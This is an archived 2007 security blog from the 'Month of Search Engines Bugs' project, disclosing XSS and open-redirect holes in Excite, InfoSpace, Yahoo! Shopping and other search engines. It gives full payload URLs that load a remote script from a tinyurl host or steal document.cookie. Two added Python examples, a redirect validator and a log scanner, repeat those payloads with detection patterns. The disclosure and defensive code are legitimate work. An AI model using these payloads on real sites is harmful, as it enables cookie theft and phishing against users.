Archive for June 2007

Month of Search Engines Bugs: day thirty

23:51 30.06.2007

The Month of Search Engines Bugs continues, and today I published new vulnerabilities.

On the thirtieth day of the Month of Search Engines Bugs I published 23 redirectors. This time the information is about holes in various search engines.

In two posts, 23 redirectors in various search engines were published.

Tomorrow I will sum up the results of the Month of Search Engines Bugs project. I will also count the votes for the bugs and determine the best bug of MOSEB. So if you have not yet voted for the bugs (in the comments), you can do it now, and tomorrow you will learn the results.

MOSEB-30 Bonus: Redirectors #2

22:45 30.06.2007

New bonus vulnerabilities in MOSEB. Today is the day of redirectors, as I wrote in MOSEB-30: Redirectors #1, and I continue to show you redirector holes in search engines.

The list of redirectors in search engines (part 2).

MSN:

Meta:

Aport:

AOL Search:

Netscape Search:

MetaCrawler:

InfoSpace:

About Google’s redirectors.

I wrote about three of Google's redirectors in MOSEB-30 and said that the first one was already fixed.

This redirector hole worked some time ago, but after the security community drew Google's attention to the issue, they added protection for it (a redirect notice page). But Google fixed it poorly, so it is possible to bypass this protection.

You just need to make a working link (with the necessary hash) and the redirector will work :-) . But this hash is temporary, so you need to update it periodically to a fresh one.

Or you can use another redirector from Google (it is another version of the first redirector, with a constant hash):

Moral: clicking on redirecting links can be dangerous.

P.S.

Tomorrow I will sum up the project's results. I'll also count the votes for all the bugs and find out the best bug of MOSEB. So if you didn't vote for the bugs yet (in the comments), you can do it now, and tomorrow you will see the results.

MOSEB-30: Redirectors #1

19:32 30.06.2007

As I wrote in the project description, I planned a surprise for you on the 30th day of Month of Search Engines Bugs. And today is the day of redirectors.

I wrote about redirectors in my article Redirectors in May (and I listed some redirectors in that article). So for detailed information read that article (if you are familiar with Ukrainian, and you should be, if you don't want to miss everything interesting), and now I will tell you a few words about this issue.

In short: redirectors are bad, because they can be used by bad guys for malicious purposes (like phishing). So redirectors must be fixed so that they do not allow blind redirecting. This is a serious problem which has not yet received attention from search engine vendors and web developers (only Google fixed one of its many redirectors, and fixed it poorly). So I am trying to draw the attention of engine vendors and the Internet community to this issue: I have already written several times at my site about them, and I decided to dedicate one day of MOSEB to redirectors.
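As an added example of the fix the paragraph asks for (this is not code from the original post or from any of the search engines), the following redirector validator refuses blind redirecting: it only forwards to a site-relative path or to a host on an allow list, and treats everything else as an attack. `ALLOWED_HOSTS` and the hostnames are constructed for the example.

```python
from urllib.parse import urlsplit, urlunsplit

# Hosts this site is willing to send users to. Constructed for this example;
# a real redirector would load this from configuration.
ALLOWED_HOSTS = {"search.example.com", "www.example.com"}


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Return a redirect target that stays on an allowed host.

    Anything else (external host, non-http scheme, protocol-relative URL,
    backslash or control-character smuggling) falls back to `default`, so the
    redirector can never be used for blind redirecting to a phishing page.
    """
    if not raw or any(ord(c) < 0x20 for c in raw):
        return default  # %00, %0d%0a etc. are never part of a legitimate target
    # Browsers treat "\" like "/" when parsing the authority, so normalise it first.
    candidate = raw.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default  # javascript:, data:, vbscript: ...
    if parts.netloc:
        # Absolute or protocol-relative URL: the host must be allow-listed.
        # parts.hostname ignores userinfo, so "allowed@evil.example" is rejected.
        if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
            return default
        return urlunsplit(parts)
    # No authority given: accept only a site-relative path. "//x" was already
    # handled above (it parses as a netloc), so a single leading "/" is required.
    if not candidate.startswith("/"):
        return default  # "http:evil.example", "evil.example/..." etc.
    return candidate
```

The same check belongs in every redirect endpoint (click trackers, login return URLs), not only in the one that was reported.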

The list of redirectors in search engines (part 1).

Google:

Yahoo:

Ask.com:

Yandex:

Rambler:

Excite:

Webcrawler:

Moral: redirectors can be dangerous.

P.S.

In the bonus post I'll write about redirector holes in other search engines and show you how to bypass Google's protection for their first redirector. So wait for today's bonus post ;-) .

Exploit digest

16:15 30.06.2007

This digest contains exploits for web applications:

  • PHPMyRing <= 4.1.3b (path) Remote File Include Vulnerability (details)
  • Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit (details)
  • JV2 Folder Gallery <= 3.0 Remote File Include Vulnerability (details)
  • Cerulean Portal System 0.7b Remote File Include Vulnerability (details)
  • Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln (details)
  • phpEventMan 1.0.2 (level) Remote File Include Vulnerabilities (details)
  • SIPS <= 0.3.1 (box.inc.php) Remote File Include Vulnerability (details)
  • Exploits WarFTPd 1.65 Username Stack-Based Buffer-Overflow Vulnerability (details)
  • Guppy <= 4.5.16 remote commands execution exploit (details)
  • EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit (details)

Month of Search Engines Bugs: day twenty-nine

23:47 29.06.2007

The Month of Search Engines Bugs continues, and today I published new vulnerabilities.

On the twenty-ninth day of the Month of Search Engines Bugs I published four Cross-Site Scripting vulnerabilities. This time the information is about holes in the Excite search engine.

  • MOSEB-29: Vulnerability at money.excite.com (details)
  • MOSEB-29 Bonus: Vulnerabilities in Excite White Pages (details)

1 XSS vulnerability in Excite Money & Investing and 3 XSS vulnerabilities in the Excite White Pages search.

We await the next day of Month of Search Engines Bugs.

MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case the vulnerabilities are at a different domain than in MOSEB-29: Vulnerability at money.excite.com.

The vulnerabilities are at Excite White Pages (kevdb.infospace.com), which is located on a server of InfoSpace (Excite's partner). I found these Cross-Site Scripting holes on 31.05.2007.

XSS:

The vulnerabilities are in the qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US

Moral: seeking in white pages can be dangerous.

Note that the Excite engine belongs to IAC Search & Media, so Ask.com is also responsible for these vulnerabilities.

Also note that Excite White Pages uses the InfoSpace engine, so InfoSpace is also responsible for these vulnerabilities.

MOSEB-29: Vulnerability at money.excite.com

19:48 29.06.2007

The next participant of the project is the Excite search engine. It is one of the popular meta search engines (in the USA).

The vulnerability is at Excite Money & Investing (money.excite.com) in the symbol search results. I found this Cross-Site Scripting hole on 31.05.2007. I used the null byte filter bypass technique for Mozilla and the slash filter bypass technique for Internet Explorer.

XSS:

The vulnerability is in the symbol_search_text parameter:
http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%3Cscript%00src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E

Also, the page with the HTML injection hole has PR7. It is a dream, and black SEO guys will be happy :-) .

Moral: searching for money can be dangerous.

Note that the Excite engine belongs to IAC Search & Media, so Ask.com is also responsible for this vulnerability.

P.S.

I have also prepared other holes concerning Excite. So wait for today's bonus post ;-) .

Vulnerability digest

16:24 29.06.2007

This digest contains vulnerabilities in web applications:

Month of Search Engines Bugs: day twenty-eight

23:14 28.06.2007

The Month of Search Engines Bugs continues, and today I published new vulnerabilities.

On the twenty-eighth day of the Month of Search Engines Bugs I published three Cross-Site Scripting vulnerabilities. This time the information is about holes in the Kelkoo and Yahoo search engines.

2 XSS vulnerabilities in the Kelkoo search engine (on two of its domains) and 1 XSS vulnerability in Yahoo! Shopping.

We await the next day of Month of Search Engines Bugs.

MOSEB-28 Bonus: Vulnerability at shopping.yahoo.com

22:42 28.06.2007

New bonus vulnerability in MOSEB. This time the vulnerability is at Yahoo! Shopping. As I wrote in MOSEB-28, Kelkoo belongs to Yahoo (and is used as part of Yahoo! Shopping), so I decided to write about a hole at shopping.yahoo.com (which is related to the Kelkoo engine described in MOSEB-28: Vulnerabilities in Kelkoo). This is a new vulnerability in Yahoo, after MOSEB-02.

The vulnerability is at Yahoo! Shopping (shopping.yahoo.com) in the Abuse Report. I found this Cross-Site Scripting hole on 24.06.2007, and it works in Internet Explorer. It is a very cute hole: to bypass the filters I used variable-width encoding with the expression technique.

XSS:

The vulnerability is in the review_excerpt and review_title parameters:
http://shopping.yahoo.com/merchrating/abuse_report.html;_ylu=?message_id=scd-337&merchant_id=1002688&review_excerpt=style%3Dxss:expression(alert(document.cookie))%20%C0&review_title=%C0

Moral: writing reports to search engine vendors can be dangerous.
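As an added example (not from the original posts), here is detection logic a defender could run over web-server access logs to flag the two payload shapes these posts rely on: the null byte inside a tag from MOSEB-29 and the stray 0xC0 lead byte beside a CSS expression() from this Yahoo! Shopping post. The log lines, client addresses and timestamps are constructed; only the parameter shapes come from the posts.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines (not from the original posts). The two malicious
# requests reuse the parameter shapes discussed above: a null byte inside the
# script tag and a stray 0xC0 lead byte beside a CSS expression().
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jun/2007:19:48:01 +0300] "GET /jsp/qt/full.jsp?symbol_search_text=%3Cscript%00src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E HTTP/1.1" 200 5120
203.0.113.5 - - [29/Jun/2007:19:50:12 +0300] "GET /jsp/qt/full.jsp?symbol_search_text=GOOG HTTP/1.1" 200 4870
198.51.100.7 - - [28/Jun/2007:22:42:30 +0300] "GET /merchrating/abuse_report.html?message_id=scd-337&review_excerpt=style%3Dxss:expression(alert(document.cookie))%20%C0&review_title=%C0 HTTP/1.1" 200 3311
198.51.100.7 - - [28/Jun/2007:22:43:05 +0300] "GET /merchrating/abuse_report.html?message_id=scd-337&review_excerpt=Great%20seller HTTP/1.1" 200 3300
"""

REQUEST_RE = re.compile(rb'"(?:GET|POST) (\S+) HTTP/')

# Checked against the normalised query string, in this order; first match wins.
SUSPICIOUS = [
    (re.compile(rb"<[^>]*script"), "script tag (null bytes stripped before matching)"),
    (re.compile(rb"expression\s*\("), "CSS expression() in an attribute value"),
    (re.compile(rb"[\xc0\xc1]"), "invalid UTF-8 lead byte (variable-width encoding trick)"),
]


def normalise(query: bytes) -> bytes:
    """Percent-decode, drop null bytes (which lenient HTML parsers ignore), lower-case."""
    return unquote_to_bytes(query).replace(b"\x00", b"").lower()


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, reason) for each request whose query matches a pattern."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line.encode("latin-1"))
        if not m or b"?" not in m.group(1):
            continue
        query = normalise(m.group(1).split(b"?", 1)[1])
        for pattern, reason in SUSPICIOUS:
            if pattern.search(query):
                hits.append((line.split(" ", 1)[0], reason))
                break
    return hits
```

Matching only after percent-decoding and null-byte removal is the point: a rule that looks for the literal string `<script` in the raw request line misses the first payload exactly as the vendor's filter did.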